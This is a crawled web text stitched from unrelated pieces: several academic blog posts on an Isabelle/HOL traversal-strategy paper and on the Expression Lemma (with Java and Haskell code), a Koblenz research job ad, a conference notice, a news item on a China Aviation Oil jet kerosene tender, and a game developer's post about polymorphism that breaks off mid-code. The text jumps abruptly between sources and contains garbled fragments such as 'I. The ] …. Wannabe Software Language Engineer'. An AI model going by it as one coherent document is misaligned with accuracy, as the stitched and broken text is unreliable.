Also, Berenike and Bernadette are turning 9 next year, and they start to get embarrassed by their parents’ actions. Shooting and publishing photos may fail to see their approval. I missed the short window of doing so. Isabelle who turns 3 next year is a fast learner and great imitator; she is even less permissive than her big sisters. Speaking of Isabelle and “approval”, I have uploaded a new paper (draft) to my website. It uses Isabelle/HOL to develop a sort of metatheory for traversal strategies. It is my first project on theorem proving. (I am sane enough not to count type-class-based programming in Haskell as theorem proving.) (Also, don’t get confused with the URL’s ending, “isabelle2”. There is really just one Isabelle/HOL paper so far. The URL helps me to avoid confusion with my youngest daughter’s photo directory, even though it is on a different host.) This is joint work with Markus Kaiser, a Mathematician, who has worked on theorem proving for some time (mostly in the context of cryptology) before he joined the SLE team in Koblenz. This paper has just been submitted. Hence feedback, if any, is appreciated, and will be considered. The actual code distribution is still a bit of a mess, as of writing, but it will be fine, if the paper’s web site says so – soon, hopefully. Title: A Formal Model of Traversal Strategies Authors: Markus Kaiser and Ralf Lämmel URL: Abstract: There is an observable increase in interest in traversal expressiveness in programming: there are new rewriting languages, programming-language extensions, and combinator libraries that enable programmers to design and deploy traversals over structured data. Such traversal programs can go wrong in new ways. For instance, a traversal may suddenly fail or diverge. It is important to gain better understanding of properties of traversal programs so that programmers make more knowledgeable choices of traversal schemes, and programming environments may provide improved documentation, targeted checks, and other support. This paper presents a machine-checked, Isabelle/HOL-based, formal model of traversal strategies. Amongst others, the model provides sufficient conditions for traversal programs not to fail and not to diverge. The model with its mechanized proofs makes systematic use of Isabelle/HOL's various capabilities for dealing with recursion or induction. I have been somewhat silent for all kinds of boring reasons, but also quite so because I am terribly slow in grasping even basic category theory. (You don’t need to have any such knowledge to enjoy this post – just a bit of time because I guess this is going to be the longest blog post ever.) Still all the categorical pain was worth it, and here is why … The Expression Lemma captures a fundamental correspondence between Functional and OO Programming. In this blog post, let me try to explain the lemma in an easygoing manner. I will cut off all mentioning of the Expression Problem which constitutes arguably a motivation for this research. Let me focus on a very obvious and compelling motivation: the lemma provides a foundation for refactoring OO programs of a certain scheme to functional programs of a certain, associated scheme (and vice versa; in case, the latter is really found useful and not considered a criminal offense). BTW, the proof of the lemma will not be discussed below. Also, I should emphasize that only the simple expression lemma will be covered here. So let me refer to the paper for all such elaborations. Before I get started I want to acknowledge that I report about joined work with Ondrej Rypacek who is currently presenting our results at the Mathematics of Program Construction conference in Marseille. In fact, Ondrej deserves most if not all credit. Ondrej also blogged about the lemma some time back, and LTU had linked to the post. Consider a recursive data structure; let’s use the abstract syntax of a tiny expression language in the running example. For simplicity, let’s limit ourselves to two expression forms: numeric literals, and binary expressions for addition. Consider some recursive operations that are defined on the data structure. Let’s use “expression evaluation” and some sort of “expression transformation” in the running example. In Java, we can use an abstract class, Expr, to model the data structure with abstract methods, eval and modn, to model the operations. (We could also use interface polymorphism.) public abstract class Expr { public abstract int eval(); // Evaluate expressions public abstract void modn(int n); // Transform modulo a constant } The two expression forms give rise to two subclasses that encapsulate data and operations. public class Num extends Expr { private int value; // State public Num(int value) { this.value = value; } // Constructor public int eval() { return value; } public void modn(int n) { this.value = this.value % n; } public class Add extends Expr { private Expr left, right; // State public Add(Expr left, Expr right) { // Constructor this.left = left; this.right = right; } public int eval() { return left.eval() + right.eval(); } public void modn(int n) { left.modn(n); right.modn(n); } The OO style of decomposition can be contrasted with the functional style (or the style of constructive, algebraic specification, if you prefer). The data variants are defined independently of any operation; operations are defined separately as functions that case-discriminate on the data variants. In Haskell: -- Expression forms data Expr = Num Int | Add Expr Expr -- Evaluate expressions eval :: Expr -> Int eval (Num i) = i eval (Add l r) = eval l + eval r -- Transform all literals modulo a constant modn :: Expr -> Int -> Expr modn (Num i) n = Num (i `mod` n) modn (Add l r) n = Add (modn l n) (modn r n) Now the 1 Million $ question is this: Are the two shown programs semantically equivalent, and, if so, how could one possibly prove the equivalence? The expression lemma will arise as an important tool in establishing that semantic equivalence. It is desirable to know of such equivalence because, for example, it would formally justify a refactoring from the OO style of decomposition to the functional one, and vice versa. Some might say that the semantic equivalence is reasonably obvious, but then again, how to formally establish this fact? Also, we are presumably looking for a general class of equivalent program couples (rather than the specific exemplars at hand), but at this stage, it is not obvious how this class would be characterized. After 2-3 semesters of computer science, you may launch the following attempt. Suppose: · j refers to the above Java program · h refers to the above Haskell program · [| . |]Java assigns semantic meanings to (the relevant subset of) Java · [| . |]Haskell assigns semantic meanings to (the relevant subset of) Haskell Then our educated but inexperienced CS student could hope to be able to show that: [| j |]Java ≡ [|h |]Haskell. Or perhaps I just skipped too many classes and had too much wine over the years, and this could work. Anyway, I reckon that this approach would require “semantic voodoo” because the established semantic domains for the two abstraction mechanisms (i.e., classes vs. recursive functions on algebraic data types) are so radically different. In fact, the above equivalence claim does not make much sense, in its current form, because the I/O behaviors do not even match at the type level. The functions of h take term-like data via an argument, while the objects of j readily encapsulate data (state) on which to invoke methods. We can match up the input type by building the objects of the OO program from the same representation that is fed into the functions. That is, expression objects would be constructed from expression terms. Let’s call this step recursive object construction, and designate a static method fromData in the class Expr. Now, if we assume that Java’s and Haskell’s integers can be compared, a “well-typed” proposition about the semantic equivalence of the eval method vs. the eval function can be stated as follows: For all expression terms t: Expr.fromData(t).eval() = eval t (Java goes left, Haskell goes right.) We cannot cover modn in this manner, as will be clear shortly. That is, the function modn returns public data – expression terms, while the method modn returns opaque data – expression objects. So how can we possibly compare the results returned by the function and the method? An apparently symmetric choice would be to introduce the presumable “inverse” of fromData; say an instance method toData which, in the case of Expr, extracts expression terms from expression objects. In fact, some of you may notice that such a couple fromData/toData would be possibly related to what’s called (de-) serialization in distributed programming or object persistency. So let’s try to match up the output type of methods and functions as follows: once a method has been performed such that a new object is returned (or an existing object is mutated), we would extract the state by serialization, hoping to use the data types of the functional program again for the representation of the externalized state, so that comparisons between functional and OO world make sense. If this all works, a “well-typed” proposition about the semantic equivalence of the modn method vs. the modn function could be stated as follows. (For simplicity of chaining, we assume that modn returns the result of the transformation; hence, it is no longer a void method – something that is, btw, for deep reasons, even more evil for a Smalltalk programmer than a Haskell programmer.) For all expression terms t, for all n: Expr.fromData(t).modn(n).toData() = modn n t (Again, Java goes left, Haskell goes right.) Let’s scrutinize this use of de-/serialization. Here we note that serialization is “normally” meant to externalize an object’s state for the sake of being able to rematerialize (de-serialize) the object later or elsewhere. Not every object is serializable (in wild life). When an object ends up being serializable, then the serialization format is still effectively private to the corresponding object type, perhaps even to a specific implementation of the type – ask your local OO expert. Do we really want to define semantic equivalence with reference to serialization (or reflection and RTTI), i.e., systematically look into the objects at hand, and patently break encapsulation? I contend that semantic equivalence should instead be defined in reference to object interfaces and behavior (rather than “core dumps” extracted from the objects). So let’s try to limit the statement of equivalence to “observations” that are readily admitted by the OO interface. When these observations return “pure data”, e.g., integers, we can easily compare the results from the functional and OO world. For instance, the semantic equivalence of the modn function vs. the modn method could be approximated by using eval to perform observations. Thus: For all integers n, for all expression terms t: Expr.fromData(t).modn(n).eval() = (eval . modn n) t This option is in peace with encapsulation, and therefore is to be favored. However, the generality of the option is still to be established. In particular, we need to find a way to universally quantify over all possible observations, and to compare the observations with the results from the functional world. To be continued. At this point, we are still struggling with two different host languages in our equations (c.f.: “Java goes left, Haskell goes right”). A formal model is in closer reach if we first eliminated one language. It’s hard to be fair every day. Let’s say goodbye to the OO language; let’s encode OO programs functionally (aka non-dysfunctionally), i.e., by using a functional object encoding. Not much is changed though: the encoding preserves the decomposition style of the OO program, and the use of objects including encapsulation. We use Haskell to encode the encoding. There are the following steps: 1. Declare an interface functor: this is a type constructor that defines the product of all method signatures for the interface of interest in terms of the state type of an object. The state type is abstracted as a type parameter; see x below. In the running example, the eval method returns an Int; the modn methods takes an Int and returns a transformed copy of “self” (aka “this”). Thus: type IExprF x = (Int, Int -> x) 2. Declare the type of opaque objects: we take the recursive closure of the interface functor. In this manner, the state type is effectively hidden from the observable interface. For convenience’s sake, we also define projections that allow us to invoke the different methods on a capsule. Thus: newtype IExpr = InIExpr { outIExpr :: IExprF IExpr } callEval = fst . outIExpr callModn = snd . outIExpr 3. Declare the type of interface implementations: This is just a trivial application of the interface functor. The idea is that an interface implementation observes the state and populates the type for the method signatures as prescribed by the interface functor. In the co-algebraic discipline of functional object encoding, the resulting type is called the co-algebra type for the functor at hand. Thus: type IExprCoAlg x = x -> IExprF x 4. Provide interface implementations: Remember, the Java blueprint contains one concrete class for numeric literals, and another concrete class for binary expressions for addition. In the former case, the state type is Int; in the latter case, the state type is a pair of IExpr objects. These are the corresponding interface implementations: numCoAlg :: IExprCoAlg Int numCoAlg = numEval /\ numModn where numEval = id numModn = mod … or in non-pointfree style: numCoAlg i = (numEval, numModn) numEval = i numModn n = i `mod` n addCoAlg :: IExprCoAlg (IExpr, IExpr) addCoAlg = addEval /\ addModn addEval = uncurry (+) . (callEval <*> callEval) addModn = uncurry (/\) . (callModn <*> callModn) addCoAlg (l,r) = (addEval, addModn) addEval = callEval l + callEval r addModn n = (callModn l n, callModn r n) 5. Provide object constructors: The Java blueprint had constructors. More generally, any class needs a protocol for populating object state. In a functional object encoding, a constructor can be modeled as a function that takes the initial state of an object, and encapsulates it with the method implementations. To this end, the fundamental operation of unfolding comes to rescue; unfold “builds” (or “constructs”) values of a functor’s recursive closure (here: IExpr) from values of some other type (here: integers or subobjects): newNum :: Int -> IExpr newNum = unfoldIExpr numCoAlg newAdd :: (IExpr, IExpr) -> IExpr newAdd = unfoldIExpr addCoAlg Conceptually, the unfold operation is defined generically for any functor: (i) apply the argument – a co-algebra (c.f. c below), (ii) map the unfold operation recursively over the positions of the functor’s type parameter (here: the occurrence of self’s type in the arguments and results of methods, c.f. fmapIExprF below), (iii) tie the recursive knot of the functor (c.f. InIExpr below). Thus: unfoldIExpr :: IExprCoAlg x -> x -> IExpr unfoldIExpr c = InIExpr . fmapIExprF (unfoldIExpr c) . c The definition of the functorial map is induced by the structure of the functor at hand. The IExprF functor comprises one using occurrence of the type parameter in the second component of the pair, specifically in the result-type position of the function type (i.e., in the return-type of the signature of the modn method). The argument of the functorial map is applied to that occurrence: fmapIExprF :: (x -> y) -> IExprF x -> IExprF y fmapIExprF f (e,m) = (e, f . m) This completes our transcription of the Java code to Haskell. As a simple illustration and clarification of the development so far, let us do some expression evaluation in different settings. In the OO setting, we construct objects by nested object construction on which we invoke the method for expression evaluation. Thus: public class Demo { public static void main(String[] args) { Expr x = new Add( new Num(39), new Add( new Num(1), new Num(2))); System.out.println(x.eval()); Likewise, in the setting of the original functional program, we construct a nested term to which we apply the function for expression evaluation. While visually similar, it is important to notice that term construction results in plain, public data whereas object construction results in objects that encapsulate private data and behavior. main = do let x = Add (Num 39) (Add (Num 1) (Num 2)) print $ eval x Here is also a demo for the functionally encoded OO program: let x = newAdd (newNum 39, newAdd (newNum 1, newNum 2)) print $ callEval x All programs agree on the result of evaluation: 42. We are now in the position to actually define fromData – as needed for matching up the input type of the two programs. Thanks to the functional object encoding it is now easier to see that it really makes sense to construct expression objects from expression trees. We exploit the fact that the recursive data structure of the functional program coincides with the recursive closure of the union of the OO state types. Here is the type of fromData: fromData :: Expr -> IExpr Our development relies on “Squiggol power” and the entire backlog of functorially parameterized morphisms. Hence, we must redefine the recursive data structure as the recursive closure of its non-recursive functorial shape. (Compare this with the non-recursive interface functor and the separate definition of its recursive closure.) Thus: type ExprF x = Either Int (x,x) newtype Expr = InExpr { outExpr :: ExprF Expr } num = InExpr . Left -- serves as constructor add = InExpr . Right -- serves as constructor The type constructor ExprF captures the functorial shape of the expression forms. That is, it is a sum over Int (corresponding to the case of numeric literals) and (x,x) (corresponding to the case of binary addition) where x is ultimately to be instantiated to the recursive closure of the functor. That closure is taken by Expr. Indeed, the newly defined Expr is isomorphic to the algebraic data type Expr – as it was defined earlier. We can now combine the constructors for the two kinds of IExpr objects into a single function that dispatches on the functorial structure; here we apply ExprF to the opaque object type: newEither :: ExprF IExpr -> IExpr newEither = newNum \/ newAdd … or more verbosely, by expansion of “\/”: newEither :: ExprF IExpr -> IExpr newEither (Left i) = newNum i newEither (Right lr) = newAdd lr It remains to apply newEither in a recursive manner. The fundamental operation of folding comes to rescue. A fold traverses over a recursive data structure while it is parameterized by a fold algebra, i.e., operations to apply to intermediate results as well as leafs. The “one-layer” constructor newEither serves as the fold algebra in our case. In different words, recursive object construction is defined as a fold over expression terms while the constructor newEither dispatches on expression forms and invokes data variant-specific constructors at each level: fromData :: Expr -> IExpr fromData = foldExpr newEither Conceptually, the fold operation is defined generically for any functor: (i) reveal one layer of functorial shape from the recursive closure (c.f. outExpr below); (ii) map the fold operation recursively over the positions of the functor’s type parameter (here: over the positions for subobjects, c.f. fmapExprF below), (iii) combine intermediate results (or process leafs) by applying the fold algebra (c.f. a below). Thus: type ExprAlg x = ExprF x -> x foldExpr :: ExprAlg x -> Expr -> x foldExpr a = a . fmapExprF (foldExpr a) . outExpr The functor implies the following functorial map: fmapExprF :: (x -> y) -> ExprF x -> ExprF y fmapExprF f (Left i) = Left i fmapExprF f (Right (x,x')) = Right (f x, f x') We are still in need of a general method for comparing the results returned by the functions vs. the methods. We already alluded to the use of observations for that purpose. There is one trick we did not yet mention. That is, we can we construct objects (an ADT) from the functional program such that the functional program’s “public” data is encapsulated with the functions to be applied to that data. As a result, we will have objects on both sides of the equation, and hence, can perform observations on both sides, which makes it easier to set up a comparison. The ADT is constructed as follows: newBoth :: Expr -> IExpr newBoth = unfoldIExpr both both :: IExprCoAlg Expr both = eval /\ modn … or more verbosely, by expansion of “/\”: both e = (eval e, modn e) It’s time for a bold claim: fromData = newBoth That is, the objects obtained by recursive construction are equivalent to the objects obtained by the ADT construction. Let’s clarify the kind of equivalence at hand. Here we note that the terms on both sides of the equation are functions, and the equality sign is meant here as extensional equality, i.e., these functions always return the same result when applied to the same argument. Now, we also need to understand that the functions return objects which are in turn tuples of functions (methods). Further, each such method can be invoked again to return new objects (i.e., yet other tuples of functions). That is, method invocation can be arranged in arbitrarily long chains. Extensional equality of fromData and newBoth implies that all these possible chains also lead to observationally equivalent results. To summarize, the objects constructed by fromData and newBoth are indistinguishable by the observations (including chains of any length) admitted by the interface. This is really as much as we could hope for within the bounds of encapsulation. Hence, from here on, we replace the vague term of semantic equivalence by the more rigorous term of observational equivalence. We are not yet ready for a proof of the above claim. Intuitively, we need to get to a point where we can show that the functional program and the OO program are based on the same problem-specific ingredients (having to do with data variants for expressions and operations thereupon) which are only composed in different manners. At this point, the functional program is particularly monolithic: two functions written in the style of general recursion. Contrast this status with the functional object encoding of the OO program, where the co-algebra identifies all problem-specific ingredients in a structured manner. It is easy enough to achieve a similar degree of modularity for the eval and modn functions by defining them in terms of fold; it is “well-known” that these forms can actually be derived automatically: eval = foldExpr evalAlg evalAlg = evalNum \/ evalAdd evalNum :: Int -> Int evalNum = id evalAdd :: (Int, Int) -> Int evalAdd = uncurry (+) modn = foldExpr modnAlg modnAlg = modnNum \/ modnAdd modnNum :: Int -> Int -> Expr modnNum = ((.) num . mod) modnAdd :: (Int -> Expr, Int -> Expr) -> Int -> Expr modnAdd = ((.) add . uncurry (/\)) The ingredients evalNum, evalAdd, modnNum and modnNum are really like the equations in the style of general recursion except that recursive components of the left-hand side are already replaced by the recursively computed results, and hence, the ingredients do not involve any recursive function applications of their own. (This is just a trivial and general consequence of committing to bananas.) The OO program is broken down into problem-specific ingredients quite similarly. Let’s compare. The functional program is structured as follows: newBoth = uI both = uI (eval /\ modn) = uI (fE (evalNum \/ evalAdd) /\ fE (modnNum \/ modnAdd)) Here, we abbreviate as follows: The OO program is structured as follows: fromData = fE newEither = fE (newNum \/ newAdd) = fE (uI (numEval /\ numModn) \/ uI (addEval /\ addModn)) In both cases, recursion is under the regime of the composition scheme. You don’t have to be a rocket scientist in category theory to smell the duality here. Subject to several conditions on the problem-specific ingredients, we may be able, eventually, to prove that both compositions are observationally equivalent. Get a coffee first; this is going to be the hard part of the post. Playing stupid, one could hope that: evalNum = numEval evalAdd = addEval modnNum = numModn modnAdd = addModn Quite obviously, this is not the case. (Not even the types fit.) A more complex correspondence has to be established. Let us do some factoring. To this end, we observe again that the functional style of decomposition results in as many “disjunctions” as there are operations; each such disjunction is processed by a fold; these folds are then combined in a conjunction. Dually, the OO style of decomposition results in as many “conjunctions” as there are data variants; each such conjunction is processed by an unfold; these unfolds are then combined in a disjunction. Let us factor out the inner uses of fold and unfold so that the problem-specific ingredients are solely composed by “/\” and “\/”. For any functor F, the following “well-known” laws allow us to replace conjunctions of folds and disjunctions of unfolds by a single (co-) recursion: The tupling law: fF a /\ fF b = fF ((a . F fst) /\ (b . F snd)) The co-tupling law: uF a \/ uF b = uF ((F Left . a) \/ (F Right . b)) (For the sake of a dense notation, we use a functor in an expression position to refer to the functorial map for that functor.) The tupling law happens to be the foundation of a powerful, optimizing transformation: if we wish to pair the results of two folds applied to the same argument (based on a split, c.f., “/\”), we can combine their fold algebras in one, and thereby do the work of both folds in one pass of recursion. That is, rather than pairing the final results of two folds, we perform pairing (and projection) at each level of recursion, and thereby suffice with one traversal. We do not care for optimization here, only for factoring. The co-tupling law is the dual of the first one. In OO terms, it tells us how to use a single interface implementation as a surrogate for two implementations of the same interface while taking the union of the state types. Regardless of any intuitions, the laws allow us to factor the functional vs. OO style of decomposition as follows: Functional: uI (fE fp) where fp = ((evalNum \/ evalAdd) . E fst) /\ ((modnNum \/ modnAdd) . E snd))) OO: fE (uI oop) oop = (I Left . (numEval /\ numModn)) \/ (I Right . (addEval /\ addModn)) Let’s distribute projections and injections so that we get conjunctions of disjunctions, or vice versa. Thus: fp = (evalNum \/ (evalAdd . (fst <*> fst))) /\ (modnNum \/ (modnAdd . (snd <*> snd))) oop = (numEval /\ ((.) Left . numModn)) \/ (addEval /\ ((.) Right . addModn)) The roles of “\/” and “/\” are flipped in fp and oop. The “well-known” abide law can be used: (f /\ g) \/ (h /\ i) = (f \/ h) /\ (g \/ i) Let’s apply the abide law to oop: oop = (numEval \/ addEval) /\ (((.) Left . numModn) \/ ((.) Right . addModn)) Now let’s match up the operands of “\/” in fp and oop. We highlight the differences in bold face. evalNum = id vs. numEval evalAdd . (fst <*> fst) = uncurry (+) . (fst <*> fst) addEval = uncurry (+) . ((fst . outIExpr) <*> (fst . outIExpr)) modnNum = (.) (InExpr . Left) . mod (.) Left . numModn = (.) Left . mod modnAdd . (snd <*> snd) = (.) (InExpr . Right) . uncurry (/\) . (snd <*> snd) (.) Right . addModn = (.) Right . uncurry (/\) . ((snd . outIExpr) <*> (snd . outIExpr)) The differences can be understood as follows. The functional program has an extra step of committing results to the recursive closure of the data functor; c.f. InExpr. The OO program has an extra step of retrieving arguments from the recursive closure of the interface functor; c.f. outIExpr. These are really just “leftovers” from the particular decomposition styles. A “common denominator” of fp and oop (referred to as lambda from here on) can be obtained by factoring out (left or right) the extra steps: oop :: IExprCoAlg (ExprF IExpr) oop = lambda . fmapExprF outIExpr fp :: ExprAlg (IExprF Expr) fp = fmapIExprF InExpr . lambda lambda = ( a \/ b ) /\ ( c \/ d ) Where a = id b = uncurry (+) . (fst <*> fst) c = (.) Left . mod d = (.) Right . uncurry (/\) . (snd <*> snd) Here is the executive summary of the steps: oop = lambda1 . fmapExprF outIExpr fp = fmapIExprF InExpr . lambda2 Step (5.) may fail for one of two reasons: What would be the type of lambda? As a Haskell programmer, you get used to all kinds of advanced cheating – one is type inference. However, let’s fight like real men, and figure out the type ourselves because this might actually help with understanding the magic at hand. We start from the types of oop and fp: oop :: IExprCoAlg (ExprF IExpr) fp :: ExprAlg (IExprF Expr) Let’s expand the type synonyms for (co-) algebras: oop :: ExprF IExpr -> IExprF (ExprF IExpr) fp :: ExprF (IExprF Expr) -> IExprF Expr Let’s do step (4.) at the type level: lambda1 :: ExprF (IExprF IExpr) -> IExprF (ExprF IExpr) lambda2 :: ExprF (IExprF Expr) -> IExprF (ExprF Expr) This does not leave much space for a type of the common denominator: lambda :: ExprF (IExprF x) -> IExprF (ExprF x) The two disagreeing positions of lambda1 and lambda2’s types (highlighted by bold face above) were generalized to the same type variable x. The type of any actual lambda must be at least as polymorphic as shown. We note that lambda‘s type is strictly more polymorphic than the explicit type signatures that we calculated for lambda1 and lambda2. If the factored definitions lambda1 and lambda2 (obtained by steps (1.)-(4.)) fail to type-check against the more polymorphic type, then our method fails to find observational equivalence. In categorical terms, the required polymorphism is what lambda makes a natural transformation, which is essentially a mapping from one functor to another. In fact, lambda is a special kind of natural transformation, i.e., a distributive law. That is, functors of source and target are actually compositions of two functors, and the composition is carried out in flipped order when comparing source and target; c.f. ExprF . IExprF vs. IExprF . ExprF. It’s pretty easy to end up outside the required polymorphism. There is actually a systematic way of discussing such causes of unnaturality. We simply look at the computed types of lambda1 and lambda2 and discuss all the differences one by one: The OO program is not allowed to invoke method chains on the subobjects. The result of invoking a subobject (by a single method call) cannot be further observed. (This follows from the fact that the general type IExpr in oop (which is isomorphic to IExprF IExpr in lambda1) is restricted to IExprF x in lambda.) This limitation may come over as odd, and a generalized expression lemma is appreciated; see our lovely paper. The OO program is not allowed to arbitrarily construct and replace subobjects. A method implementation is bound (by the type) to use the objects returned by the observations of the subobjects to fill in the slots for the subobjects in the result. This is arguably not a bad limitation as it rules out OO programs that sort of arbitrarily rewrite the object graph. That is, the methods are enforced to be compositional in a certain way. The functional program is not allowed to examine the precise expression structure of the intermediate results obtained by recursion. The less polymorphic type of lambda2 exposes the precise expression structure; the extra polymorphism of lambda hides the expression structure. Imposing such a ban on functional programmers resembles the notion of opaque data on the OO side, where one is not allowed to examine state (except when backdoors lack reflection and serialization are leveraged). The functional program is not allowed to construct deep terms while combining intermediate results obtained by recursion. The type of lambda only admits one layer of functorial shape in the result; it does not even allow leaving out that single layer of functorial shape. This limitation may come over as odd, and a generalized expression lemma is appreciated; again, see our lovely paper. If we are able to match up the ingredients of a functional program and an OO program using the above steps (1.)-(5.), then the Expression Lemma promises observational equivalence for the different styles of composing the ingredients. The following version of the lemma glances over some technical details; please look at the paper, if you need to know more, and want to scrutinize the lemma or its proof. Given are two functors, T and I, think of T as the data functor (like ExprF in the example), think of I as the interface functor (like IExprF in the example). We assume generic definitions of fold and unfold for any functor. For clarity, we continue to attach the functor in question to any use of fold and unfold. Let’s stop using problem-specific recursive data types, and use the following generic type constructor for taking the recursive closure of any functor: newtype Mu f = In { out :: f (Mu f) } Then, for any lambda :: T (I x) -> I (T x), the following identity holds: unfoldI (foldT ((I In) . lambda) = foldT (unfoldI (lambda . (T out)) (Read as: “Functional and OO programming is not too much different!”) We can also use the developed machinery to refactor an OO program into a functional program (or vice versa). For instance, in the direction of OO to functional programming, we first factor the OO program according to the steps (1.)—(4.), if possible. Then we set lambda = lambda1 and lambda2 = lambda. Now, we attempt the steps (1.)—(4.) in inverse order so that the functional program is calculated. Likewise, the other direction can be accommodated. The refactoring fails if we hit a “case without counterpart”: I hope some of you actually managed to get to the end of this text. I also hope that the text helps with improving the understanding of the fundamental correspondence between functional and OO programming. Of course, there are many loose ends that need more work. For instance, how do we deal with hard-core non-functional objects (when mutation and aliasing cannot be ignored)? Also, what are the exact mechanics of a refactoring transformation? Further, how does the state of the art in fold mining relate to the needs of our method? Yet further, what other ideas for refactoring OO to functional programs must be critically integrated to make a contribution to real-world scenarios such as multi-core parallelization? Finally, I realize that despite this long text, the presentation is still somewhat dense for someone not trained in Squiggol power and Haskell magic; so I hope that Ondrej and me end up writing a comprehensive tutorial on the full subject some day. Have a great summer! Let me go back to the beach now that I have finished this quick post. Ralf Lämmel The department of Computer Science, University Koblenz-Landau, Campus Koblenz invites applications for 2 research positions, available initially for 2 years: * 1 PostDoc* 1 PhD student The corresponding funding is part of the state of Rhineland Palatinate's Research Initiative 2008-2011.. Please consult the ADAPT home page for further details: 9 research groups from the CS department in Koblenz (from several of its institutes) are associated with the theme. Also, the theme leverages collaboration with international partners at the CWI,Amsterdam, and Chalmers University of Technology, Göteborg. The successful applicants will research in the interdisciplinary context of ADAPT, and be actively involved in further building up and refining the research theme. Thus, the positions provide extra opportunities for qualified applicants to distinguish themselves, in addition to the research aspects and the possibility to work on a dissertation and habilitation thesis. The deadline for applications is 1 September 2008. Email applications are preferred. See the contact section on the ADAPT home page. Participants:* Bernhard Beckert (Formal Methods and AI, Spokesperson)* Jürgen Ebert (Software Engineering)* Ulrich Furbach (Artificial Intelligence, Spokesperson)* Rüdiger Grimm (IT Risk Management)* Ralf Lämmel (Software Languages, Spokesperson)* Dietrich Paulus (Active Vision)* Steffen Staab (IS and Semantic Web)* Klaus Troitzsch (Empirical Methods, Modeling and Simulation)* Dieter Zöbel (Real-Time Systems and Mobile Systems Eng.) 1st International Conference on Software Language Engineering (SLE) There are slightly extended deadlines: **Revised submission dates: Abstract submission: July 16th; Paper submission: July 21st** I also look fwd the following keynote speakers: Obviously, I also look fwd being in Toulouse. The next 2 weeks I am going to enjoy the Baltic Sea though. I. The ] …. Wannabe Software Language Engineer Recently,. CALL FOR PAPERSIEEE Transactions on Software EngineeringSpecial Issue on Software Language EngineeringMay: Guest editors:
http://blogs.msdn.com/ralflammel/
crawl-002
refinedweb
6,625
52.7
27 July 2012 15:18 [Source: ICIS news] SINGAPORE (ICIS)--Asian jet trader China Aviation Oil (CAO) has issued a purchase tender for four 240,000–300,000 bbl cargoes of jet kerosene for end-August and September loading, an industry source said on Friday. The CAO tender requested cargoes for loading from northeast or southeast ?xml:namespace> CAO also requested one 25,000-tonne jet kerosene cargo for purchase CFR (cost & freight) Huangpu for arrival on 5-7 September, via the same tender, said the source. The CAO purchase tender will close on 30 July and has validity until 31 July. Previously, CAO awarded a purchase tender for four 240,000–300,000 bbl jet kerosene cargoes for loading at the end of July and August at a firmer level of around Jet-kerosene values have strengthened in recent weeks buoyed by demand from the Middle East
http://www.icis.com/Articles/2012/07/27/9581808/cao-issues-end-august-september-jet-kerosene-purchase-tender.html
CC-MAIN-2014-42
refinedweb
148
52.73
data interval). shutdown: The task was externally requested to shut down when it was running restarting: The task was externally requested to restart when it was running deferred: The task has been deferred to a trigger data interval. There may also be instances of the same task, but for different data intervals -. This applies to all Airflow tasks, including sensors. execution_timeout controls the maximum time allowed for every execution. If execution_timeout is breached, the task times out and AirflowTaskTimeout is raised. In addition, sensors have a timeout parameter. This only matters for sensors in reschedule mode. timeout controls the maximum time allowed for the sensor to succeed. If timeout is breached, AirflowSensorTimeout will be raised and the sensor fails immediately without retrying. The following SFTPSensor example illustrates this. The sensor is in reschedule mode, meaning it is periodically executed and rescheduled until it succeeds. Each time the sensor pokes the SFTP server, it is allowed to take maximum 60 seconds as defined by execution_time. If it takes the sensor more than 60 seconds to poke the SFTP server, AirflowTaskTimeoutwill be raised. The sensor is allowed to retry when this happens. It can retry up to 2 times as defined by retries. From the start of the first execution, till it eventually succeeds (i.e. after the file 'root/test' appears), the sensor is allowed maximum 3600 seconds as defined by timeout. In other words, if the file does not appear on the SFTP server within 3600 seconds, the sensor will raise AirflowSensorTimeout. It will not retry when this error is raised. If the sensor fails due to other reasons such as network outages during the 3600 seconds interval, it can retry up to 2 times as defined by retries. Retrying does not reset the timeout. It will still have up to 3600 seconds in total for it to succeed. sensor = SFTPSensor( task_id="sensor", path="/root/test", execution_timeout=timedelta(seconds=60), timeout=3600, retries=2, mode="reschedule", ). sla_miss_callback¶ You can also supply an sla_miss_callback that will be called when the SLA is missed if you want to run your own logic. The function signature of an sla_miss_callback requires 5 parameters. dag task_list blocking_task_list Any task in the DAGRun(s) (with the same execution_dateas a task that missed SLA) that is not in a SUCCESS state at the time that the sla_miss_callbackruns. i.e. 'running', 'failed'. These tasks are described as tasks that are blocking itself or another task from completing before its SLA window is complete. slas blocking_tis List of the TaskInstance objects that are associated with the tasks in the blocking_task_listparameter. Examples of sla_miss_callback function signature: def my_sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis): ... def my_sla_miss_callback(*args): ....
https://airflow.apache.org/docs/apache-airflow/2.2.1/concepts/tasks.html
CC-MAIN-2022-33
refinedweb
446
56.35
While it's on my mind, I wanted to write here few lessons I learned in last few days. - If the language supports polymorphism, USE IT. - Design before coding. - Having properly structured code helps. A LOT. - Keep the objects closely related on one heap. I've started to hunt coop related bugs in the game. Code, on the first look, seems to work perfectly; however, most code is structured like: if (multiPlayer == 0) { // do single player behavior } else { // do co op behavior }or a variation of that code, depending on player which "activates" part of the code. So, here's lesson 1: Why making numerous comparisons like that through the whole class - some of which are surprisingly volatile - when I can make new class which inherits the current one and override specific methods to adapt them for co-op mode of the game. With that, I'm also avoiding the problem of pointless allocation of resources (time and memory) for object related to co-op mode. Sound simple, right? Well, lessons 2 and 3 strike here at the same time. Due to "designing on the fly", I have to rewrite and refactor big parts of the code to adapt them for polymorphism. This means a lot of wasted time, due to the though process: "Hmm, I'd like to add <feature 1>. Well, I can add this code here, and that code there... *writing code* Oh cool, this works! Yaay!" "Now, to add <feature 2>... *writing* Crap, <feature 1> code isn't good here anymore... *moving and/or rewriting code* Good, now works." "OK, <feature 3> is next... oh not again, <feature 1> is broken. *rewriting and/or moving code*" "ARRRRRGH, NOT AGAIN!" (I'm now at this point) Result: lots of wasted time trying to improve the structure of the game while trying to preserve current functionality (a.k.a. trying to NOT break it). However, while I'm rewriting the code, I have to be careful. Some parts of the code, with best example being Draw(GameTime) method where last drawn object is on top, require executing in specific order. So, I can't simply do this: public class A : GameScreen { // ... public override void Draw(GameTime gameTime) { // ... } } public class B : A { // ... public override void Draw(GameTime gameTime) { // ... spriteBatch.Draw(player2texture, player2rectangle, Color.White); base.Draw(gameTime); } }because Player 2's sprite would end on bottom of everything, which may not be desirable. Solution for that problem that I came up with is to extract relevant parts of A.Draw() and raise them to Protected level: public class A : GameScreen { // ... public override void Draw(GameTime gameTime) { PartA(); PartB(); } protected void PartA() { // ... } protected void PartB() { // ... } } public class 